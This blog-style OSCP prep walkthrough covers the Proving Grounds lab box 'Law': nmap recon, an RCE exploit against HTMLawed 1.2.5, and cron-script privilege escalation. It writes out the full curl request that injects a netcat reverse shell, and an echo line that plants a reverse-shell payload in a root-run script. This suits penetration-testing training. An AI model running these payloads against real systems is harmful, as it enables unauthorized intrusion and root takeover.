OSCP Prep Box 44 – Law – Proving Grounds Practice

Posted on

Hi everyone

Today we are going to look for a Box called Law which is rated as intermediate in terms of difficulty. This machine has various phases: Recon, Enumeration, Exploitation and Privilege Escalation.

Box Type: Linux

Recon & Enumeration

Enumeration plays a very significant role in pen testing. The more properly you enumerate the more it will be easy to get a foothold on the target.

First, we will check whether target is reachable or not with ping command:

ping Target_IP

With ping command output we found that the target is reachable.

Now let’s move ahead and run the port scan for which we will be using Nmap a popular tool for port scanning and it will provide details of the various ports which are in Open state. The command for that will be:

nmap -sC -sV -O -oA nmap/initial 192.168.201.190

nmap -sC -sV -O -p- -oA nmap/full 192.168.201.190 -T4

I discovered these ports are open:

  • 22/tcp – SSH Service running OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
  • 80/tcp – HTTP Service running Apache httpd 2.4.56 ((Debian))
  • OS: Linux

Then I went ahead and checked the IP in the web browser and I found a HTMLawed 1.2.5 running:

Exploitation

I found the RCE exploit for the same and used it in order to get the initial foothold:

Exploit Link

Command : curl -s -d “sid=foo&hhook=exec&text=/usr/bin/nc 192.168.45.162 80 -e /usr/bin/sh” -b “sid=foo” http://192.168.201.190/

I got the shell and I tried the following command to grab the local.txt flag:

find / -type f -name “local.txt” 2>/dev/null

I found the local.txt flag

Privilege Escalation

Now it was a time for escalating the privileges.

I found a shell script called cleanup.sh and it was running as cronjob. So I modified the script with reverse shell payload:

echo “nc 192.168.45.162 80 9002 -e /usr/bin/bash” >> /var/www/cleanup.sh

I started the netcat listener:

The above image shows the proof.txt file.

Key Takeaways

  • Full port & service enumeration first — small version leaks can mean big exploits.
  • Don’t trust web apps at face value — outdated components are easy entry points.
  • Always inspect scheduled tasks & background jobs — privilege escalation often hides there.
  • If a higher-privileged script is writable, you own the execution flow.
  • Escalation isn’t magic — it’s finding what runs as root and making it run your code.

If you enjoyed this post, share it with your friends and colleagues!

Leave a Reply

Your email address will not be published. Required fields are marked *